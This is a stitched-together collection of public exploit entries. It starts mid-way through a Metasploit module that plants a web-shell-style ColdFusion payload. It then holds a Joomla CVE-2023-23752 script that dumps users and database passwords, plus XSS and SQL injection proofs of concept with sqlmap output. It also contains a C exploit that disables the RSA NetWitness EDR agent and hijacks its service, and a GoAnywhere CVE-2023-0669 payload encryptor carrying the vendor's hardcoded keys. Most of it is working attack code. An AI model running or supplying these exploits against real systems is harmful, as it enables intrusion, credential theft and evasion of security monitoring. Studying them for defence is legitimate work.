    # NOTE(review): job_file_path and file_path reference the same String object
    # here, so the `<<` below appends to both before gsub builds the
    # doubled-separator copy used for the 'file' field — confirm this is the
    # intended form for the job's file path.
    case target['Type']
    when :unix_cmd
      file_path << '/'
      job_file_path = "#{job_file_path.gsub('/', '//')}//"
    when :windows_cmd
      file_path << '\\'
      job_file_path = "#{job_file_path.gsub('\\', '\\\\')}\\"
    end
    update_job = send_request_cgi({
      'method' => 'POST',
      'uri' => target_uri.path,
      'keep_cookies' => true,
      'vars_get' => {
        'action' => 'services.schedule',
        'action2' => 'edit',
        'task' => create_job.headers['location'].split('=')[-1]
      },
      'vars_post' => {
        'name' => payload_base,
        'url' => get_uri.to_s,
        'port' => datastore['SRVPORT'],
        'timeout' => '50',
        'username' => '',
        'password' => '',
        'proxyserver' => '',
        'proxyport' => '',
        'proxyuser' => '',
        'proxypassword' => '',
        'publish' => 'true',
        'file' => "#{job_file_path}#{payload_base}.cfm",
        'start_day' => '01',
        'start_month' => '02',
        'start_year' => '2023',
        'start_hour' => '00',
        'start_minute' => '00',
        'start_second' => '00',
        'end_day' => '',
        'end_month' => '',
        'end_year' => '',
        'end_hour' => '',
        'end_minute' => '',
        'end_second' => '',
        'interval_hour' => '1',
        'interval_minute' => '0',
        'interval_second' => '0',
        'run' => 'update'
      }
    })
    fail_with(Failure::Unreachable, 'Could not connect to the web service') if update_job.nil?
    fail_with(Failure::UnexpectedReply, 'Unable to update job') unless update_job.code == 302 || update_job.code == 200
    # The .cfm written at the webroot is the on-disk artefact; FileDropper
    # removes it on cleanup.
    register_files_for_cleanup("#{file_path}#{payload_base}.cfm")
    print_good('Job ' + payload_base + ' updated successfully')
  end

  # Triggers the job (mainAction=execute), then polls the published
  # /<payload_base>.cfm until PAYLOAD_DEPLOY_TIMEOUT elapses, reporting any
  # output returned with a 200.
  def execute_job(payload_base)
    print_status("Executing scheduled job: #{payload_base}")
    job_execution = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'vars_get' => {
        'action' => 'services.schedule'
      },
      'vars_post' => {
        'row_1' => '1',
        'name_1' => payload_base,
        'mainAction' => 'execute'
      }
    })
    fail_with(Failure::Unreachable, 'Could not connect to the web service') if job_execution.nil?
    fail_with(Failure::Unknown, 'Unable to execute job') unless job_execution.code == 302 || job_execution.code == 200
    print_good('Job ' + payload_base + ' executed successfully')
    payload_response = nil
    # The block's truthiness ends the retry loop: nil response, a 200 whose
    # body lacks 'Error', or a 500 all count as "done".
    retry_until_truthy(timeout: datastore['PAYLOAD_DEPLOY_TIMEOUT']) do
      print_status('Attempting to access payload...')
      payload_response = send_request_cgi(
        'uri' => '/' + payload_base + '.cfm',
        'method' => 'GET'
      )
      payload_response.nil? || (payload_response && payload_response.code == 200 && payload_response.body.exclude?('Error')) || (payload_response.code == 500)
    end
    # Unix systems tend to return a 500 response code when executing a shell. Windows tends to return a nil response, hence the check for both.
    fail_with(Failure::Unknown, 'Unable to execute payload') unless payload_response.nil? || payload_response.code == 200 || payload_response.code == 500
    if payload_response.nil?
      print_status('No response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!'))
    elsif payload_response.code == 200
      print_good('Received 200 response from ' + payload_base + '.cfm')
      output = payload_response.body.strip
      if output.include?("\n")
        print_good('Output:')
        print_line(output)
      elsif output.present?
        print_good('Output: ' + output)
      end
    elsif payload_response.code == 500
      print_status('Received 500 response from ' + payload_base + '.cfm' + (session_created? ? '' : ' Check your listener!'))
    end
  end

  # Reads the webroot path out of the admin page: the text node two siblings
  # after the element whose text contains "Webroot". Returns nil when the page
  # cannot be fetched; the safe-navigation chain yields nil if the markup differs.
  def webroot
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    })
    return nil unless res
    res.get_html_document.at('[text()*="Webroot"]')&.next&.next&.text
  end

  # Builds the single-line <cfscript> served to the target: a cfexecute call
  # that decodes the base64-embedded payload and runs it via cmd.exe /c or
  # /bin/bash -c depending on the selected target. Leading whitespace and
  # newlines are stripped so the stub is one line.
  def cfm_stub
    case target['Type']
    when :windows_cmd
      <<~CFM.gsub(/^\s+/, '').tr("\n", '')
        <cfscript>
        cfexecute(name="cmd.exe", arguments="/c " & toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64")),timeout=5);
        </cfscript>
      CFM
    when :unix_cmd
      <<~CFM.gsub(/^\s+/, '').tr("\n", '')
        <cfscript>
        cfexecute(name="/bin/bash", arguments=["-c", toString(binaryDecode("#{Base64.strict_encode64(payload.encoded)}", "base64"))],timeout=5);
        </cfscript>
      CFM
    end
  end
end
#!/usr/bin/env ruby
# Exploit
## Title: Joomla! v4.2.8 - Unauthenticated information disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752
## Date: 2023-03-24
## Vendor Homepage: https://www.joomla.org/
## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)
## Tested on: Joomla! Version 4.2.7
## CVE : CVE-2023-23752
## References:
## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/
## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752
## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752
## - https://vulncheck.com/blog/joomla-for-rce
## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml
#
# Defender note: the script sends two unauthenticated GETs to the webservice
# API, /api/index.php/v1/users?public=true and
# /api/index.php/v1/config/application?public=true, and prints what comes
# back — the second includes database host, user and password (see
# display_config). Alert on those paths from unauthenticated clients, and
# treat the database credentials as exposed if such requests are found;
# the fixed version is named in the header above.

# standard library
require 'json'
# gems
require 'httpx'
require 'docopt'
require 'paint'

doc = <<~DOCOPT
  #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}

  #{Paint['Usage:', :red]}
    #{__FILE__} <url> [options]
    #{__FILE__} -h | --help

  #{Paint['Parameters:', :red]}
    <url>  Root URL (base path) including HTTP scheme, port and root folder

  #{Paint['Options:', :red]}
    --debug     Display arguments
    --no-color  Disable colorized output (NO_COLOR environment variable is respected too)
    -h, --help  Show this screen

  #{Paint['Examples:', :red]}
    #{__FILE__} http://127.0.0.1:4242
    #{__FILE__} https://example.org/subdir

  #{Paint['Project:', :red]}
    #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)
    #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)
    #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)
DOCOPT

# GET the users endpoint and return the raw HTTP response.
def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end

# Parse the users response into an array of hashes
# (:id, :name, :username, :email, :groups), keeping only entries of type 'users'.
def parse_users(root_url, http)
  data_json = fetch_users(root_url, http)
  data = JSON.parse(data_json)['data']
  users = []
  data.each do |user|
    if user['type'] == 'users'
      id = user['attributes']['id']
      name = user['attributes']['name']
      username = user['attributes']['username']
      email = user['attributes']['email']
      groups = user['attributes']['group_names']
      users << {id: id, name: name, username: username, email: email, groups: groups}
    end
  end
  users
end

# Print one line per user found.
def display_users(root_url, http)
  users = parse_users(root_url, http)
  puts Paint['Users', :red, :bold]
  users.each do |u|
    puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"
  end
end

# GET the application config endpoint and return the raw HTTP response.
def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end

# Flatten the config response into a single hash: each 'application' entry
# carries one attribute, keyed by its first (only) attribute name.
def parse_config(root_url, http)
  data_json = fetch_config(root_url, http)
  data = JSON.parse(data_json)['data']
  config = {}
  data.each do |entry|
    if entry['type'] == 'application'
      key = entry['attributes'].keys.first
      config[key] = entry['attributes'][key]
    end
  end
  config
end

# Print site and database settings, including the DB user and password.
def display_config(root_url, http)
  c = parse_config(root_url, http)
  puts Paint['Site info', :red, :bold]
  puts "Site name: #{c['sitename']}"
  puts "Editor: #{c['editor']}"
  puts "Captcha: #{c['captcha']}"
  puts "Access: #{c['access']}"
  puts "Debug status: #{c['debug']}"
  puts
  puts Paint['Database info', :red, :bold]
  puts "DB type: #{c['dbtype']}"
  puts "DB host: #{c['host']}"
  puts "DB user: #{Paint[c['user'], :yellow, :bold]}"
  puts "DB password: #{Paint[c['password'], :yellow, :bold]}"
  puts "DB name: #{c['db']}"
  puts "DB prefix: #{c['dbprefix']}"
  puts "DB encryption #{c['dbencryption']}"
end

# Entry point: parse arguments with docopt, then run both disclosures.
# Only Docopt::Exit (usage/--help) is rescued; HTTP or JSON errors propagate.
begin
  args = Docopt.docopt(doc)
  Paint.mode = 0 if args['--no-color']
  puts args if args['--debug']
  http = HTTPX
  display_users(args['<url>'], http)
  puts
  display_config(args['<url>'], http)
rescue Docopt::Exit => e
  puts e.message
end
Exploit Title: ENTAB ERP 1.0 - Username PII leak
Date: 17.05.2022
Exploit Author: Deb Prasad Banerjee
Vendor Homepage: https://www.entab.in
Version: Entab ERP 1.0
Tested on: Windows IIS
CVE: CVE-2022-30076
Vulnerability Name: Broken Access control via Rate Limits

Description:
In the entab software in fapscampuscare.in, there is a login portal with a UserId field. An authenticated user enters their UserId and is shown their name, as well as other services. However, a rate limit should be in place, and it is not present. As a result, an attacker can bypass the system and obtain other usernames via broken access control. This enables a threat actor to obtain the complete full name and user ID of the person.

POC:
1. Go to fapscampuscare.in or any entab hosted software and find the entab software.
2. Use a proxy to intercept the request.
3. Since it's a student login, try a random UserId (e.g., s11111).
4. Intercept the request using Burp Suite and send it to the Intruder.
5. Select payloads from number 100000-20000, and turn off URL encoding on the UserId parameter.
6. Start the attack and sort by length to obtain the username and full name of other users.
  20. # Exploit Title: Online Appointment System V1.0 - Cross-Site Scripting (XSS) # Date: 25/02/2023 # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html # Tested on: Windows use payload="><script>alert(XSS)</script> 1. visit-http://localhost/doctor/applicationlayer/Doctorpatient.php 2. login Doctor account with default credential 3. Click left side add description 4. capture request and put payload http://localhost/doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E request GET /doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1 Host: localhost Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql Connection: close
  21. # Exploit Title: RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] RSA Security www.netwitness.com [Product] NetWitness Endpoint EDR Agent The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response. [Vulnerability Type] Incorrect Access Control / Code Execution [CVE Reference] CVE-2022-47529 [Security Issue] CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification. Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report. 
SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe [Severity] Critical [Impact(s)] Denial-of-Service Arbitrary Code Execution [Attack Vector] To exploit, open handle to memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group [Affected Product Code Base] All versions prior to v12.2 [Network Access] Local [References] https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935 [Vuln Code Block]: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 push rbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 test rcx, rcx .text:00000001400F7B1C jz short loc_1400F7B5C .text:00000001400F7B1E call cs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:00000001400F7B28 call cs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1 ; bManualReset .text:00000001400F7B33 xor r9d, r9d ; lpName .text:00000001400F7B36 mov r8d, edx ; bInitialState .text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes .text:00000001400F7B3B call cs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C test rax, rax .text:00000001400F7B4F jz short loc_1400F7B5C [Exploit/POC] "RSA_NetWitness_Exploit.c" #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" #define OPEN_ALL_ACCESS 0x1F0003 /* RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution RSA NetWitness.msi --> NWEAgent.exe MD5: c0aa7e52cbf7799161bac9ebefa38d49 Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent. 
Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user. By John Page (hyp3rlinx) - Nov 2022 DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no harm. X64 PE file vuln code block: 00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p .text:00000001400F7B10 ; sub_14013BA50+19?p .text:00000001400F7B10 ; DATA XREF: ... .text:00000001400F7B10 push rbx .text:00000001400F7B12 sub rsp, 20h .text:00000001400F7B16 mov rbx, rcx .text:00000001400F7B19 test rcx, rcx .text:00000001400F7B1C jz short loc_1400F7B5C .text:00000001400F7B1E call cs:InitializeCriticalSection .text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection .text:00000001400F7B28 call cs:InitializeCriticalSection .text:00000001400F7B2E mov edx, 1 ; bManualReset .text:00000001400F7B33 xor r9d, r9d ; lpName .text:00000001400F7B36 mov r8d, edx ; bInitialState .text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes .text:00000001400F7B3B call cs:CreateEventW .text:00000001400F7B41 mov [rbx+50h], rax .text:00000001400F7B45 mov dword ptr [rbx+58h], 0 .text:00000001400F7B4C test rax, rax .text:00000001400F7B4F jz short loc_1400F7B5C 1) Install "RSA NetWitness.msi" (Endpoint EDR Agent) 2) Run Exploit PoC as a Standard non-admin user, the PoC will: a) Open a handle (copy) to Ecat002 event. b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group. c) Set/Reset event the Ecat002 handle. d) if admin privs change the EDR service configuration Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln. 
*/ char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"}; BOOL PWNED=FALSE; void Exploit(); int AdminChl(); void HijackSvcConfig(); int main(void){ printf("[+] RSA NetWitness EDR Agent 0Day\n"); printf("[+] CVE-2022-47529\n"); printf("[+] Discovery: John Page (aka hyp3rlinx)\n"); printf("[+] ===================================\n"); Exploit(); if( AdminChk() ){ printf("[+] Hijacked NetWitness Agent Service!\n"); HijackSvcConfig(); } Sleep(2000); printf("[+] Done!\n\n"); system("pause"); return 0; } void Exploit(){ PACL pOldDACL = NULL; PACL pNewDACL = NULL; HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002"); int i=0; for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){ HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]); if(hEvent != INVALID_HANDLE_VALUE){ printf("[-] Targeting Event: %s\n", Vuln_Events[i]); Sleep(500); if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){ TRUSTEE trustee[1]; trustee[0].TrusteeForm = TRUSTEE_IS_NAME; trustee[0].TrusteeType = TRUSTEE_IS_GROUP; trustee[0].ptstrName = TEXT("Everyone"); trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE; trustee[0].pMultipleTrustee = NULL; EXPLICIT_ACCESS explicit_access_list[1]; ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS)); explicit_access_list[0].grfAccessMode = DENY_ACCESS; explicit_access_list[0].grfAccessPermissions = GENERIC_ALL; explicit_access_list[0].grfInheritance = NO_INHERITANCE; explicit_access_list[0].Trustee = trustee[0]; if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! ", GetLastError()); } if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ printf("%s%d", "[!] Not vulnerable! 
", GetLastError()); }else{ SetEvent(hEvent_Ecat002); Sleep(1000); ResetEvent(hEvent_Ecat002); CloseHandle(hEvent_Ecat002); SetEvent(hEvent); Sleep(1000); PWNED=TRUE; } if(PWNED){ LocalFree(pNewDACL); LocalFree(pOldDACL); CloseHandle(hEvent); } Sleep(1000); } } } } //If run as admin, modify the agent service config to run our own code. int AdminChk(){ int result = 0; HANDLE hToken = NULL; if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){ TOKEN_ELEVATION elevated; DWORD tokSize = sizeof(TOKEN_ELEVATION); if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){ result = elevated.TokenIsElevated; } } if(hToken){ CloseHandle(hToken); } return result; } //Trivial example modify the service config... void HijackSvcConfig(){ Sleep(1000); WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0); } [POC Video URL] https://www.youtube.com/watch?v=kO1fu4IOlSs [Disclosure Timeline] Vendor Notification: December 2, 2022 CVE assigned: December 19, 2022 Hotfix v12.1.0.1: January 3, 2023 Fixed in v12.2.0.0 January 4, 2023 Restested for vendor: January 6, 2023 March 24, 2023 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  22. # Exploit Title: Medicine Tracker System v1.0 - Sql Injection # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip # Version: V1.0.0 # Tested on: Windows/Linux # Proof of Concept: # 1- http://localhost/php-mts/app/login.php # 2- login with default credential # 3- Click left side Manage account and fill Update User Details and click update account # 4- Capture request using burp suite # 5- Save request request.txt Sqlmap POST /php-mts/classes/Users.php?f=save_user HTTP/1.1 Host: localhost Content-Length: 661 sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeOo3CzyRX6fHexZx X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-mts/app/?page=manage_account Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql Connection: close ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="id" 1'-' ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="firstname" gogo ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="middlename" ogo ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="lastname" singh ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="username" [email protected] ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="password" 12345678 ------WebKitFormBoundaryeOo3CzyRX6fHexZx-- sqlmap sqlmap -r request.txt -p "id" --dbs 
--batch ___ __H__ ___ ___["]_____ ___ ___ {1.6.12#stable} |_ -| . ['] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 13:18:01 /2023-03-21/ [13:18:01] [INFO] parsing HTTP request from 'request.txt' it appears that provided value for POST parameter 'id' has boundaries. Do you want to inject inside? ('' or true*--') [y/N] N [13:18:01] [INFO] resuming back-end DBMS 'mysql' [13:18:01] [INFO] testing connection to the target URL [13:18:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=' or true AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(3138=3138,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mDhI--&name=para&description=ss Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=' or true AND (SELECT 8994 FROM (SELECT(SLEEP(5)))doso)-- HjCh--&name=para&description=ss --- [13:18:01] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.54, PHP 8.0.25 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:18:01] [INFO] fetching database names [13:18:01] [INFO] resumed: 'information_schema' [13:18:01] [INFO] resumed: 'art_gallery' [13:18:01] [INFO] resumed: 'hcpms' [13:18:01] [INFO] resumed: 'mts_db' [13:18:01] [INFO] resumed: 'mysql' [13:18:01] [INFO] resumed: 'performance_schema' [13:18:01] [INFO] resumed: 'phpmyadmin' [13:18:01] [INFO] resumed: 'sscdms_db' 
[13:18:01] [INFO] resumed: 'test' available databases [9]: [*] art_gallery [*] hcpms [*] information_schema [*] mts_db [*] mysql [*] performance_schema [*] phpmyadmin [*] sscdms_db [*] test [13:18:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.2' [*] ending @ 13:18:01 /2023-03-21/
  23. // Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)
// Google Dork: title:"GoAnywhere"
// Date: 3/26/2023
// Exploit Author: Youssef Muhammad
// Vendor Homepage: https://www.goanywhere.com/
// Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0
// Version: > 7.1.1 for windows / > 7.0.3 for Linux
// Tested on: Windows, Linux
// CVE : CVE-2023-0669
// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution
import java.util.Base64;
import javax.crypto.Cipher;
import java.nio.charset.StandardCharsets;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.file.Files;
import java.nio.file.Paths;

/**
 * Encrypts a file's bytes with AES/CBC/PKCS5Padding under a key derived
 * (PBKDF2-HMAC-SHA1) from string constants embedded in this class, with a
 * fixed IV, and prints the result as URL-safe Base64 (suffixed with "$2" when
 * version "2" is selected).
 *
 * Review note (defender's view): everything needed to produce a valid
 * ciphertext — KDF password, salt, iteration count and IV — is a constant in
 * this program, and there is no MAC or signature over the output. A blob
 * built this way therefore proves nothing about who produced it, so whatever
 * consumes it must not treat "it decrypts" as a trust signal. The
 * structural fix is per-deployment secret key material plus authenticated
 * encryption (an AEAD mode) checked before the plaintext is used.
 */
public class CVE_2023_0669_helper {
    static String ALGORITHM = "AES/CBC/PKCS5Padding";
    // Placeholder; encrypt() replaces it with the derived 256-bit key (30
    // bytes would not be a valid AES key length, but this value is never used).
    // NOTE(review): a static, mutable key shared by all callers — encrypt()
    // is not safe to call concurrently with different versions.
    static byte[] KEY = new byte[30];
    // Fixed IV: the 16 ASCII bytes of "AES/CBC/PKCS5Pad". A constant IV under
    // a constant key makes identical plaintexts encrypt to identical output.
    static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);

    /**
     * Usage: java CVE_2023_0669_helper <file_path> <version>
     * Reads the whole file, encrypts it for the given version ("2" selects
     * the V2 key derivation, anything else V1) and prints the bundle.
     * Exits with status 1 when the argument count is wrong.
     */
    public static void main(String[] args) throws Exception {
        if (args.length != 2) {
            System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");
            System.exit(1);
        }
        String filePath = args[0];
        String version = args[1];
        byte[] fileContent = Files.readAllBytes(Paths.get(filePath));
        String encryptedContent = encrypt(fileContent, version);
        System.out.println(encryptedContent);
    }

    /**
     * Encrypt data and Base64-encode the ciphertext.
     *
     * @param data    plaintext bytes
     * @param version "2" for the V2 key derivation, any other value for V1
     * @return URL-safe Base64 of the ciphertext, plus "$2" when version is "2"
     * @throws Exception propagated from the JCE calls
     */
    public static String encrypt(byte[] data, String version) throws Exception {
        Cipher cipher = Cipher.getInstance(ALGORITHM);
        // Side effect: overwrites the static KEY field.
        KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();
        SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");
        IvParameterSpec ivSpec = new IvParameterSpec(IV);
        cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);
        byte[] encryptedObject = cipher.doFinal(data);
        String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);
        // Version marker appended after the Base64 text, outside the ciphertext.
        String v = (version.equals("2")) ? "$2" : "";
        bundle += v;
        return bundle;
    }

    // Version 1 Encryption
    // PBKDF2-HMAC-SHA1 over a constant password with an 8-byte constant salt,
    // 9535 iterations, 256-bit output. The new String(getBytes(), "UTF-8")
    // round trip is effectively a no-op for this ASCII input.
    private static byte[] getInitializationValue() throws Exception {
        String param1 = "go@nywhereLicenseP@$$wrd";
        byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};
        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();
    }

    // Version 2 Encryption
    // Same construction with a different constant password, a 16-byte
    // constant salt and 3392 iterations.
    private static byte[] getInitializationValueV2() throws Exception {
        String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";
        byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};
        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();
    }
}
